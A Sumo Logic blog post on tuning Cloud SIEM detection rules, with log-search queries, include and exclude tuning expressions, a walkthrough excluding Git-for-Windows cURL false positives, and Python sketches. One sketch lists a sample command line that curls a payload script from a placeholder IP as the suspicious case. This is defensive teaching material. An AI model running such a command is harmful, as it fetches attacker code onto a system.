Sumo Logic Inc.

07/02/2024 | Press release | Distributed by Public on 07/02/2024 16:11

Rule tuning – supercharge Cloud SIEM for better alerts

We've all seen the movies where a character needs to get out of a jam or get somewhere in a hurry, so they mash the big nitrous oxide button and boom, they're off! The Fast and the Furious and Boss Level are the two movies that come to mind. So, how does this relate to a SIEM or SIEM rules? Sit down, buckle up, and let's go for a ride.

Sumo Logic's Cloud SIEM runs on rules. Whether they are the out-of-the-box (OOTB) rules that come with the product or homegrown custom rules, the SIEM requires rules and events to function, detect, and provide value. What makes Cloud SIEM special in this regard is its connection with the Sumo Logic Platform. A SIEM with good rules is one thing, but being able to perform deep analysis of your SIEM's output on the same platform is a completely different beast.

The OOTB rules in Cloud SIEM build in the best of a "one size fits all" model. But we know your organization is unique, which is why you'll want to make the most of customization and tuning for things like geographical locations, custom applications, vulnerability scanning, and other policy nuances that are very specific to each individual org.

Let's explore the tools available for customized rule tuning, namely the sec_signal index, search parse operators, rule tuning expressions, and how they can be used for data driven rule analysis and performance tuning. In addition, let's put these tools to work with a practical example of tuning out a particularly noisy false positive from our development team.

Utilizing the Sumo Logic Platform with SIEM data, we can boost the NOS for power tuning the SIEM. Let's dig in and put our historical SIEM detection analysis tools to work and drive SIEM performance to new levels. Because we'll be jumping into some advanced mechanics and detection outputs from Cloud SIEM, if you're not familiar with the data pipeline and terminology, you can always refer back to this introduction to Cloud SIEM for clarification.

Sumo Logic Log Search

SIEM detections are the best source for improvement opportunities for the detections themselves. The detections from Cloud SIEM (Signal) are indexed in the Sumo Logic Platform, providing an invaluable data source and historical record of detections in an environment.

The Signal Index

The Signals (detections) from Cloud SIEM are sent to the Sumo Logic Platform, where they can be queried with Log Search (for simplicity, we'll refer to this as search). They are accessible using the following search syntax:

_index=sec_signal

Intended for auditing Signal activity from Cloud SIEM, this data source is perfect for data driven understanding and tuning of detections. This index contains the Signals, and within each signal, metadata related to the Record and the Signal itself. We'll use fields from the Signal and the Record(s) for a more detailed understanding of behavior and to craft finely-tuned Rule Tuning Expressions. (For more info on Cloud SIEM Auditing, check out the Enterprise Audit app).

Auditing Signals gives us direct access to existing information from which to build tuning expressions. Because all of this information is stored within the Sumo Logic Platform, the following parse operators are just as applicable to SIEM Record searches. Searching within the Records provides true historical validation of your Tuning Expressions, in a context where fine tuning can be tested and validated at scale prior to SIEM Signal generation and tuning.

The Cloud SIEM Records Index

The Cloud SIEM pipeline processes raw logs into normalized Records. These Records are used by the SIEM and are also available in search.

Cloud SIEM has multiple types of Rules, all of which can generate Signals, though some Rules require more than one Record for correlation. The Signals in the sec_signal index above have a single Record for each Match Expression of the Rule in the fullRecords portion of the Signal. Search is the way to view all of the associated Records of a Signal.

Parse Operators Primer

An important primer on accessing fields in search: of the multiple Parse Operators available, these are the ones we'll use here: Parse JSON, Parse Regex, and Dynamic Parsing (Copy Field Name). Alongside these operators, we will add the parse multi and nodrop options to extract values from the Signal or Record to work with.

Parse JSON

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity

What this search does:

  • Searches the sec_signal index and extracts basic Entity fields

  • Using parse JSON extracts entity and entity_type fields from the entities field

  • Possible future searches for correlation on entity and entity_type

Signals are stored as JSON, so parse JSON gives us access to the fields nested within the Signal. Using the field= option, we can access the elements nested within a field, as demonstrated with entity and entity_type above. Nodrop is a critical parse option in Sumo Logic search, to the point that we've added a section below to talk about it. In this example, every Signal will have an entity, so there is no need to add nodrop here.

Parse JSON arrays (with Nodrop)

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| json field=fullRecords "[*].metadata_product" as metadata_products nodrop
| json field=fullRecords "[*].metadata_vendor" as metadata_vendors nodrop
| count by metadata_vendors,metadata_products

What this search does (building on the previous search):

  • Creates two arrays for all metadata_products and metadata_vendors contained within the SIEM records in the Signals

  • Future correlation possibilities, like correlating Vendor and Products to Entities.

Parse JSON allows for parsing multiple values within a Signal, which is helpful for Signals with multiple Records stored, such as those from Threshold and Chain rules. For a single or specific Record, use [0].fieldName, where the numeral 0 is the position within the array (0 being the first or only element), to parse a single value. The [*].fieldName form parses all values for that JSON key into the named array, as the metadata_products line demonstrates above.

Note the use of nodrop within this search. Signals will have a vendor and product (see SIEM pipeline docs); however, when parsing multiple values of other (non-metadata) fields, nodrop can save headaches by exposing fields and conditions that may not have the expected values.
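To make the difference between the [0] and [*] paths concrete, here is a minimal Python sketch run against a made-up Signal. The Signal contents, the sample values, and the helper names first_value and all_values are hypothetical; only the field names entities, fullRecords, metadata_vendor, and metadata_product come from the searches above. It mimics the idea behind the two path styles and is not how Sumo Logic evaluates them.

```python
import json

# Hypothetical Signal, trimmed to the fields used in the searches above.
signal_json = """
{
  "entities": [{"type": "_username", "value": "jdoe"}],
  "fullRecords": [
    {"metadata_vendor": "Microsoft", "metadata_product": "Windows"},
    {"metadata_vendor": "Okta", "metadata_product": "SSO"}
  ]
}
"""


def first_value(items, key):
    """Rough analogue of the "[0].key" path: one value from the first element."""
    return items[0][key]


def all_values(items, key):
    """Rough analogue of the "[*].key" path: every value, collected into a list."""
    return [item[key] for item in items if key in item]


signal = json.loads(signal_json)
entity_type = first_value(signal["entities"], "type")
entity = first_value(signal["entities"], "value")
metadata_products = all_values(signal["fullRecords"], "metadata_product")
metadata_vendors = all_values(signal["fullRecords"], "metadata_vendor")

print(entity_type, entity)
print(metadata_vendors, metadata_products)
```

The single-value helper only ever sees the first Record, which is why the wildcard form matters for Signals that carry more than one Record.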

Copy Field Name

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].parentBaseImage" as parentBaseImage
| %"fullRecords[0].baseImage" as baseImage
| %"fullRecords[0].commandLine" as commandLine

Copy Field Name is available through the Search UI by right-clicking on the desired field and selecting "Copy Field Name"; the result looks like the %"fullRecords[0].parentBaseImage" example above. One limitation of this method is that the wildcard [*] is invalid, so only single fields within the Signal are accessible.

Personal preference and style are always a factor with search. The entity and entity_type fields parsed in the above examples are ideal candidates for Copy Field Name parsing; aesthetically, however, parse JSON is my preference. Accessing the parentBaseImage, baseImage, and commandLine fields with this method works, though it parses only a single Record's fields from the Signal.

Parse Regex (with JSON, Multi, and Nodrop)

_index=sec_signal
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| json field=fullRecords "[*].metadata_product" as metadata_products nodrop
| json field=fullRecords "[*].metadata_vendor" as metadata_vendors nodrop
| parse regex field=metadata_products "\"(?<metadata_product>[^\"]+)\"" multi nodrop
| parse regex field=metadata_vendors "\"(?<metadata_vendor>[^\"]+)\"" multi nodrop
| count by metadata_vendor,metadata_product
| order by _count DESC

What this search does (building on the previous search):

  • Extraction of Vendor and Product values from the previously created array

  • Future correlation possibilities, like correlating Vendor and Products to Entities.

This example combines parse JSON to create arrays and parse Regex to parse the unique values from these arrays, allowing deeper access to the Record fields within the Signal. This is especially important with Chain Rules, as the Signals will contain two or more Records, depending on the Match Expressions within the rule.
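As a rough illustration of what the regex step contributes, the Python sketch below pulls each quoted value out of an array that has been rendered as a string. The sample array value is hypothetical, and Python's re module stands in for Sumo Logic's regex engine, so treat it as a sketch of the idea rather than the product's behavior.

```python
import re

# Hypothetical value of metadata_products after the "[*]" JSON parse:
# a JSON array rendered as a string.
metadata_products = '["Windows","SSO"]'

# Same shape as the regex in the search: a named group capturing
# everything between a pair of double quotes.
# Python spells named groups (?P<name>...); the search uses (?<name>...).
pattern = re.compile(r'"(?P<metadata_product>[^"]+)"')

# finditer yields every match, which is the role "multi" plays in the search.
products = [m.group("metadata_product") for m in pattern.finditer(metadata_products)]

print(products)
```

Without the equivalent of multi, only the first quoted value would be captured, and the second Record's product would never reach the aggregation.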

Avoid pitfalls of not matching with Nodrop

Nodrop is an important option deserving of a callout by itself. From the docs: "The nodrop option forces results to also include messages that don't match any segment of the parse expression." With multiple parse operators being used in a query, it is important to understand that nodrop will return results when used with all operators. That is, if a record is within scope of the query but does not contain the parsed nodrop field, it will still be returned in the results, though the field will be treated as isBlank/isEmpty (this is different from the field containing a "null" value).

Using nodrop allows for the aggregation of various fields across multiple records and signals, where each signal may not contain every parsed field, providing a broader view of aggregated Signal activity for a specific or unique entity. [Spoiler alert] Also useful in identifying a common field across records that can be used to effectively tune the rule to exclude or include only that specific field and value.

Choosing not to use nodrop on a parse operator filters the results to only those records that contain the parsed field. This is very useful as a filter and for eliminating blank values from aggregate views of your data in search results.
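The two behaviors can be sketched in a few lines of Python. The records, the parse_field helper, and its nodrop flag are all hypothetical stand-ins; the sketch only models the filter-versus-keep distinction described above.

```python
# Hypothetical parsed records; the second one has no commandLine field.
records = [
    {"entity": "jdoe", "commandLine": "whoami"},
    {"entity": "asmith"},
    {"entity": "jdoe", "commandLine": "curl https://example.com"},
]


def parse_field(rows, field, nodrop=False):
    """Extract `field` from each row.

    Without nodrop, rows missing the field are dropped (parse acts as a filter).
    With nodrop, they are kept and the field is left as an empty string.
    """
    out = []
    for row in rows:
        if field in row:
            out.append(dict(row))
        elif nodrop:
            out.append({**row, field: ""})
    return out


filtered = parse_field(records, "commandLine")
kept = parse_field(records, "commandLine", nodrop=True)
blank_entities = [r["entity"] for r in kept if r["commandLine"] == ""]

print(len(filtered), len(kept), blank_entities)
```

The record for asmith survives only in the nodrop case, with a blank commandLine, which is exactly the kind of row that would otherwise silently vanish from an aggregate.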

The combination and use of these search operators allow the identification of important fields and values, especially for those values nested within the fullRecords part of a Signal, for understanding and fine tuning at an extremely granular level.

Rule tuning

Rule tuning expressions are a powerful feature, allowing users to extend a rule's match expression by appending additional match logic. This enables extending rules without having to duplicate an existing rule for customization, which would mean missing out on possible future improvements from the Sumo Logic Threat Labs team. This feature is a key tool in customizing Sumo Logic's OOTB rules to individual organizations.

Getting expressive with Tuning Expressions

With great power, comes great responsibility; or something close enough with Tuning Expressions. As extensions to the match expression of rules, rule tuning expressions are powerful tools, with some added nuance.

To include or exclude

The selection of "include" or "exclude" for the tuning expression, with the default being "include", translates to appending the tuning expression after an "AND" (include) or an "AND NOT" (exclude).

The following examples demonstrate how the include and exclude options apply AND and AND NOT to a rule's match expression. These examples are for demonstration purposes only; if implemented without the additional rules required for modifying the Impossible Travel rule, they will reduce important visibility.

Let's boost the functionality of our Impossible Travel rule (THRESHOLD-S00097) and explore two ways of excluding two known countries where the team authenticates from regularly with tuning expressions, and see how they come together in the resulting match expression in the Signal.

This is a copy of Sumo Logic's Impossible Travel (successful) rule. What does it detect?

  • Two successful authentications

  • From two different source IP countries

  • Within one hour

Note that no specific countries were specified in the rule logic, though at the bottom of the image there is a US CA exclusion, using the include tuning expression ("AND").

Include country exclusion (AND)

The include expression adds an AND (tuning expression).

What this expression does:

  • Includes an AND (NOT Source IP Country Code IN the specified array of countries)

What this looks like in a Signal's Match Expression:

  • AND (NOT srcDevice_ipCountryCode IN ("US","CA"))

Exclude country (NOT)

The exclude expression adds an AND (NOT (tuning expression))

From the Signal:

  • AND (NOT (srcDevice_ipCountryCode IN ("US","CA")))

Quick recap, using the include and exclude for our tuning expression, we removed two countries from our impossible travel rule - meaning the Impossible travel rule will no longer detect or create Signals from any authentications from the United States or Canada.
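To see that the two forms land on the same result, here is a small Python sketch that evaluates both against a few made-up events. The base_match stand-in, the success field, and the sample events are hypothetical; only srcDevice_ipCountryCode and the US/CA list come from the expressions above.

```python
TRUSTED = {"US", "CA"}


def base_match(event):
    """Stand-in for the rule's own match expression (hypothetical)."""
    return event["success"]


def include_form(event):
    # Include: base AND (tuning), where the tuning expression carries its own NOT.
    return base_match(event) and (not (event["srcDevice_ipCountryCode"] in TRUSTED))


def exclude_form(event):
    # Exclude: base AND (NOT (tuning)), where the tuning expression is the plain IN test.
    tuning = event["srcDevice_ipCountryCode"] in TRUSTED
    return base_match(event) and (not tuning)


events = [
    {"success": True, "srcDevice_ipCountryCode": "US"},
    {"success": True, "srcDevice_ipCountryCode": "DE"},
    {"success": False, "srcDevice_ipCountryCode": "BR"},
]

for e in events:
    print(e["srcDevice_ipCountryCode"], include_form(e), exclude_form(e))
```

Both functions agree on every event, so the choice between include and exclude here comes down to which reads more clearly to the next person maintaining the expression.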

Brittleness and less is more

Detections and pattern matches can be brittle, meaning they can be too specific or exact with matches, so they fail when something as subtle as a single character is different. To complicate mitigating brittleness, there is also an issue of complexity which may introduce or compound brittleness.

Rules that utilize fields like commandLine from an endpoint or EndpointProcess event tap into rich data sources that allow for great detections. Commands can range from simple short words, whoami, to verbose scripts or multiple commands that include URLs. As the variety and complexity of the field is highly variable, it is easy to look at a few signals and make a tuning expression that seems to work, and does in some cases, but does not in all the needed cases.

With the help of Search and reviewing the record fields in Signals, we can explore an example of complexity, and find ways to mitigate brittleness.

Use Case: First Seen cURL repeated detection on the same URL

First Seen cURL execution from user (FIRST-S00040) detects the first time a user executes a unique commandLine with a process name (baseImage) containing lower cased "curl". Cloud SIEM builds a per Entity baseline of seven days for every user (user_username) in the environment observed using cURL and will alert on new values for the commandLine after that period of time.

We have looked at our Signals from this rule and see there is a Windows system with Git installed repeatedly checking the GitHub API for updates.

How can we take this signal and build a tuning expression to exclude this trusted traffic?

A seemingly easy way is to take the commandLine expression from the Signal, and use it as a tuning expression for the rule.

Here's why this is a deceptive trap!

  • The First Seen Rule looks for new values of a specific field, in this case commandLine. If the commandLine is copied from an existing Signal, that value has already been seen.
    • Because the commandLine is a previously seen value, the rule will not alert on it again until the retention period expires.

    • The expression would only prevent a Signal in the event the retention period expires for this commandLine.

Outcome: Tuning Expression, albeit technically accurate, would fail for our intended use case of tuning out this update check.

Using search to validate and understand

Let's go to search to find out what makes this commandLine unique and what is variable in comparison with other commands and Signals.

_index=sec_signal "FIRST-S00040" "git"
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].commandLine" as commandLine
| count by commandLine

What this search does:

  • Scopes the search with the sec_signal index for signals containing the terms:
    • "FIRST-S00040", the rule id we are looking for

    • "git", the string of text in the command line

  • References the commandLine field name (using Copy Field Name)

  • Performs a count aggregation on the commandLine field for analysis

Here are a couple things learned from these results:

  • The uniqueness in the commandLine is introduced by the name of the text file written to Temp
    • Every run creates a new dynamically generated file name, making every execution unique

    • Copying a single commandLine will only exclude that execution, if ever seen again.

  • Bonus find: there is another legitimate Git update URL

Building a tuning expression for Git for Windows

What do we know?

  • A commandLine with known variations, but still predictable

  • Identified two Git URLs in the commands, that do not change

Validating what we know before tuning:

_index=sec_signal "FIRST-S00040" "git"
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].commandLine" as commandLine
| where (toLowerCase(commandLine) matches "*git-for-windows*" OR toLowerCase(commandLine) matches "*gitforwindows*")
| count as total_count

What this search does:

  • Produces a singular Aggregate for total_count of Signals matching the specified command lines

Confirming that this search accounts for the same number of Signals as the original "git" search will validate the Tuning Expression.

What the results show:

  • Provides a reference number of signals that match our tuning expression logic
    • Command line containing "git-for-windows" or "gitforwindows"

  • With the aggregate showing a single number, spot checking the raw Signal is a good sanity check
    • Using Messages, a quick scan of the Signals can visually verify nothing has crept into our results
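The reason the wildcard match holds up where a copied commandLine does not can be sketched in Python. The command lines, the example.test URL, and the temp file names below are hypothetical, and fnmatchcase stands in for the wildcard matching used in the search; only the "git-for-windows" and "gitforwindows" patterns come from the search above.

```python
from fnmatch import fnmatchcase

# Hypothetical command lines: the URL is stable, the temp file name changes per run.
seen = "curl.exe -o C:\\Temp\\upd_a1b2.txt https://api.example.test/git-for-windows/releases"
new = "curl.exe -o C:\\Temp\\upd_9z8y.txt https://api.example.test/git-for-windows/releases"


def exact_rule(command_line):
    """Brittle: only matches the one command line copied from a Signal."""
    return command_line == seen


def wildcard_rule(command_line):
    """Matches on the stable part of the command, ignoring the temp file name."""
    lowered = command_line.lower()
    return fnmatchcase(lowered, "*git-for-windows*") or fnmatchcase(lowered, "*gitforwindows*")


print(exact_rule(new))     # the next run has a new file name, so the copy misses it
print(wildcard_rule(new))  # the stable substring still matches
```

The exact comparison fails on the very next execution, while the wildcard version keeps matching as long as the stable substring is present.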

Measure twice, cut once! - Tools in the toolbox for validation

One small change to the above search lets you see the impact of this tuning expression retroactively. Only the search is retroactive; the tuning expression takes effect from the time it's applied to a rule and enabled, going forward.

_index=sec_signal "FIRST-S00040"
| json field=entities "[0].type" as entity_type
| json field=entities "[0].value" as entity
| %"fullRecords[0].commandLine" as commandLine
| where ruleid matches "FIRST-S00040"
| if(toLowerCase(commandLine) matches "*git-for-windows*" OR toLowerCase(commandLine) matches "*gitforwindows*","Tuned Out","Non-Git") as git_tuning
| count by git_tuning

What this search does:

  • Building on the previous search, we use the IF operator to validate whether our tuning condition would have "tuned out" the Signal had it been applied earlier
    • Moving from a "where" condition to an "if" condition does not restrict the results to where they match on the specified command lines, but creates a new field "git_tuning" that we can use as a label

What we learn from the results:

  • The tuning expression will tune out a large number of the false positive signals
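The same label-then-count idea, sketched in Python over a handful of made-up command lines. The sample data and the git_tuning helper are hypothetical; the labels and patterns mirror the search above.

```python
from collections import Counter

# Hypothetical command lines taken from Signals of a single rule.
command_lines = [
    "curl.exe -o C:\\Temp\\a.txt https://api.example.test/git-for-windows/releases",
    "curl.exe -o C:\\Temp\\b.txt https://gitforwindows.example.test/latest",
    "curl http://203.0.113.10/payload.sh",
]


def git_tuning(command_line):
    """Label a command line instead of filtering it, like the if() in the search."""
    lowered = command_line.lower()
    if "git-for-windows" in lowered or "gitforwindows" in lowered:
        return "Tuned Out"
    return "Non-Git"


counts = Counter(git_tuning(c) for c in command_lines)

print(counts["Tuned Out"], counts["Non-Git"])
```

Labeling rather than filtering keeps the untouched Signals in view, so it is easy to confirm that the expression is not swallowing anything it should not.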

Applying the tuning expression

Navigate in Cloud SIEM to Content, Rule Tuning

Use the "Create" button to create a new expression.

This is the "GitForWindows cURL" expression created to tune out our Git related false positives.

  • Rule ID applied = FIRST-S00040

  • Exclude the expression:
    • (lower(commandLine) matches "*git-for-windows*" OR lower(commandLine) matches "*gitforwindows*")

Observing the change

In Cloud SIEM, using the Signals page provides an excellent means for validating that the freshly applied tuning expression is working (high volume Signals make this easier). A quick Signal filter helps to validate in the SIEM our tuning expression is functioning as intended.

Of the multiple ways to get to the Signals page so the filtering can be done, these are two that have been the easiest:

The Rule page:

  • The bottom of each Rule page shows "View all … Signals"

  • Clicking on this takes us to the Signals page and applies the following filter
    • RuleID is "FIRST-S00040" and suppressed is false

  • This will take you to the Signals view with the Rule Id already specified

  • Following the steps in the next section will implement the filter to the Signals view

Through the Signals

  • Similar to the above method, going to the Signals portion of SIEM will allow you to filter the search
    • Filtering uses Tab completion, entering the following allows you to filter the Signals
      • Rule Id is FIRST-S00040 (Already done if you came from the signals count link)

      • Remove the suppressed is false filter

      • Created time past 30 minutes

Monitoring for Signals created is straightforward with this view, seeing reduction in Signal creation from high volume to low or no volume is easy to watch here. When it comes to Rule Tuning with Signals that are a little more voluminous, using favorite fields (starred fields) or going into an individual Signal to spot check, will provide validation that the Tuning Expression has been successfully implemented. Another means, with validation, is to use the keyword string match in the filter, keyword = "git", to look for all Signals from the specified Rule within the time window.

Diving deeper with audit events:

Remember - with great power, comes great responsibility! Tuning Expressions can be applied to all rules - this may occasionally be ideal, but understand the implications of a Tuning Expression going awry, as a simple mistake can prevent all Signal generation, blinding the SIEM.

_index=sumologic_audit_events "RuleTuningExpressionCreated"
| values(%"ruleTuningExpression.ruleIds") as rule_ids by eventTime,%"operator.email",%"ruleTuningExpression.name"

What this Search does:

  • Scopes the query to RuleTuningExpressionCreated events within the sumologic_audit_events index

  • Aggregates the Event Time of the creation, the user's email address, and the name of the Tuning Expression, and shows all the rule_ids the expression was applied to
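For a feel of what this aggregation produces, and how it could feed a quick review, here is a Python sketch over made-up audit events. The event contents, the email addresses, the second expression name, and the MAX_RULES threshold are all hypothetical; only the field names are taken from the search above.

```python
from collections import defaultdict

# Hypothetical audit events, flattened to the fields used in the search above.
events = [
    {
        "eventTime": "2024-06-01T10:00:00Z",
        "operator.email": "analyst@example.com",
        "ruleTuningExpression.name": "GitForWindows cURL",
        "ruleTuningExpression.ruleIds": ["FIRST-S00040"],
    },
    {
        "eventTime": "2024-06-02T09:30:00Z",
        "operator.email": "engineer@example.com",
        "ruleTuningExpression.name": "Trusted countries",
        "ruleTuningExpression.ruleIds": ["THRESHOLD-S00097", "FIRST-S00040"],
    },
]

# Group rule ids by (time, operator, expression name), like values(...) by ...
grouped = defaultdict(set)
for event in events:
    key = (
        event["eventTime"],
        event["operator.email"],
        event["ruleTuningExpression.name"],
    )
    grouped[key].update(event["ruleTuningExpression.ruleIds"])

# Hypothetical review threshold: flag expressions touching more than one rule.
MAX_RULES = 1
needs_review = sorted(
    name for (_, _, name), ids in grouped.items() if len(ids) > MAX_RULES
)

print(needs_review)
```

An expression that touches many rules is not necessarily wrong, but it is the first place to look when Signal volume drops unexpectedly.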

Further exploration in the sumologic_audit_events index is highly recommended.

  • Another eventName that is useful for Rule Tuning Expression audits is "RuleTuningExpressionUpdated"

Final thoughts

The process above is designed for iteration: identify and, most importantly, validate tuning opportunities as you work through a Rule or a set of Signals. The balancing act between detection opportunities and over-tuning takes effort. As we gain more experience with rule tuning, we understand the underlying data and how it can be applied to improve the process. This process leads directly to reducing noise, analyst toil, and false positives, and continues to clearly showcase the value of Cloud SIEM in your environment.

You now understand the data lifecycle in Cloud SIEM, specifically about the sec_signal index that allows for auditing of SIEM detections and how to use Search Parse Operators to unlock the power of unique values for performance tuning. Using these tools, you can now remove a false positive from a noisy rule, freeing up analyst resources to more effectively work on more important alerts.

SIEM tuning is an exercise in iteration, working through the data from the SIEM to refine detections and reduce noise, freeing up the analysts to focus and find those important True Positives. Performance tuning is as straightforward as finding a Rule or Signal, working through the detections, gathering the data, testing it against historical data, and implementing the change. Utilization is as close by as a Search and a curiosity on what can be improved.

Happy Hunting and boosting your SIEM!

Learn how Roku approaches rule tuning for improved situational awareness.
